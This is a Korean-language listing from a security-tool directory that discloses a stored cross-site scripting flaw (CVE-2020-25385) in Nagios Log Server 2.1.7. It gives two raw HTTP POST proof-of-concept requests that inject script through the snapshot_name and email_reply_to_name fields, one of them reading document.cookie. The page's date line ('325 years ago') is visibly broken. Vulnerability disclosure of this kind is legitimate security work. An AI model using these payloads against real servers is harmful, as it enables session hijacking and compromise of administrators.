Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting — Nagios Log Server 2.1.7의 저장형 크로스 사이트 스크립팅(XSS) 취약점으로 인해 공격자가 악의적으로 조작된 링크나 제3자 웹 페이지를 여는 사용자에게 악성 작업을 수행할 수 있습니다. | Kitploit
도구/GitHubGitHub/emreovunc/nagios-log-server-2.1.7-persistent-cross-site-scripting
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubemreovunc/nagios-log-server-2.1.7-persistent-cross-site-scripting

Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

Nagios Log Server 2.1.7의 저장형 크로스 사이트 스크립팅(XSS) 취약점으로 인해 공격자가 악의적으로 조작된 링크나 제3자 웹 페이지를 여는 사용자에게 악성 작업을 수행할 수 있습니다.

저장소 보기
325년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Nagios Log Server 2.1.7 지속적 크로스 사이트 스크립팅

Nagios Log Server 2.1.7의 저장형 크로스 사이트 스크립팅(XSS) 취약점으로 인해 공격자는 악의적으로 조작된 링크나 타사 웹 페이지를 여는 사용자에게 악성 작업을 수행할 수 있습니다.

Nagios Log Server 2.1.7 및 이전 버전은 이러한 취약점의 영향을 받습니다.

CVE-2020-25385

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25385

PoC-1

취약점을 악용하려면 공격자는 POST 요청을 '/nagioslogserver/configure/create_snapshot'에 보내고 요청 본문의 'snapshot_name' 매개변수를 조작하여 악의적으로 조작된 링크나 타사 웹 페이지를 여는 사용자에게 영향을 줄 수 있습니다.

root@kitploit:~
POST /nagioslogserver/configure/create_snapshot HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
DNT: 1
Connection: close
Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd; ls_session=883lergotgcjbh9bjgaeakosv5go2gbb; PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53
Upgrade-Insecure-Requests: 1

csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E

PoC-2

취약점을 악용하려면 공격자는 POST 요청을 '/nagioslogserver/admin/mail'에 보내고 요청 본문의 'email_reply_to_name' 매개변수를 조작하여 악의적으로 조작된 링크나 타사 웹 페이지를 여는 사용자에게 영향을 줄 수 있습니다.

root@kitploit:~
POST /nagioslogserver/admin/mail HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 291
DNT: 1
Connection: close
Cookie: csrf_ls=6e418c757282ab5c4785dad327238158; ls_session=pscogfricmnpe9kpvbtcuccn8mfempgp
Upgrade-Insecure-Requests: 1

csrf_ls=6e418c757282ab5c4785dad327238158&email_from_name=Nagios+Log+Server&email_from=root%40localhost&email_reply_to_name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email_reply_to=root%40localhost&email_method=mail&smtp_host=&smtp_crypto=&smtp_port=25&smtp_user=&smtp_pass=

도구 다운로드